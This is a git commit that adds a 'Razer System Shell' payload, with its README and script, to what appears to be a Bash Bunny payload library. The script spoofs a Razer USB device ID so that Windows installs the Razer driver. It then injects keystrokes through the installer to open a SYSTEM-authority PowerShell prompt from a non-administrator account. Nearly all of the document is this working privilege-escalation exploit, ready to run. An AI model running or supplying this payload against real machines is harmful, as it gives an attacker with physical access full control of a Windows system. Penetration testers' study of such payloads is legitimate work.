New Payload: Razer System Shell (#463)

Exploit Razer USA HID driver installation to System authority PowerShell. This is heavily based on Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunny
2021-08-24 20:30:24 +01:00 · 2021-08-24 20:30:24 +01:00 · 9fdacee185
parent 9b86d8c991
commit 9fdacee185
2 changed files with 62 additions and 0 deletions
--- a/payloads/library/execution/RazerSystemShell/README.md
+++ b/payloads/library/execution/RazerSystemShell/README.md
@ -0,0 +1,22 @@
+# Razer System Shell from Bash Bunny
+
+Author:        Emptyhen
+Version:       0.1
+
+## Description
+Makes use of a exploitation that's part of the driver installation process for Razer HID devices. From a low privilege (non administrator account) this code produces a System authority PowerShell prompt.
+
+There are some long delays built into this payload to allow for the time required to install the drivers and start the Razer Synaptics installation and configuration tool.
+
+Although this has been designed for the Bash Bunny, it should be compatible with the Key Croc too.
+
+Note: To run the payload a second time, the Razer driver needs to be removed from Device Manager.
+
+## STATUS
+| LED Status             | Status                                            |
+|------------------------|---------------------------------------------------|
+| PINK                   | Payload starting and configuring the attack mode. |
+| ORANGE - Single Flash  | Waiting for drivers to be installed.              |
+| ORANGE - Two Flashes   | Injecting keystrokes to create the shell.         |
+| ORANGE - Three Flashes | Waiting for PowerShell to launch                  |
+| GREEN                  | Payload finished.                                 |
--- a/payloads/library/execution/RazerSystemShell/payload.txt
+++ b/payloads/library/execution/RazerSystemShell/payload.txt
@ -0,0 +1,40 @@
+# Title:         Razer System Shell
+# Description:   Exploit Razer USA HID driver installation to System authority PowerShell. 
+#                This is heavily based on Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunny
+# Author:        Emptyhen
+# Props:         @_MG_, @Hak5Darren, @KalaniMakutu - Original Concept
+                 Cribbit, NightGhost - Great suggestions to clean up the PoC.
+# Version:       0.1
+# Category:      Execution
+# Target:        Windows 10 (Powershell)
+# Attackmodes:   Serial, HID
+
+LED SETUP
+
+# Serial isn't actually used but appears to be required to make the HID work correctly.
+ATTACKMODE SERIAL HID VID_0X1532 PID_0X0064
+
+# Long delay to allow the driver installation and wait for the Razer Synaptics to start up.
+# Note this only happens after the driver is installed - to run this again, remove the Razer HID driver in Device Manager.
+LED STAGE1
+QUACK DELAY 40000
+
+# Inject Keystrokes to Launch a Powershell Window.
+LED STAGE2
+QUACK SPACE
+for run in {1..5}; do QUACK TAB; done
+QUACK RIGHT
+QUACK RIGHT
+QUACK ENTER
+QUACK DELAY 500
+QUACK ALT D
+QUACK STRING powershell
+QUACK ENTER
+
+# A 'nt autority\system' PowerShell prompt should get spawned. 
+LED STAGE3
+QUACK DELAY 10000
+QUACK STRING whoami
+QUACK ENTER
+
+LED FINISH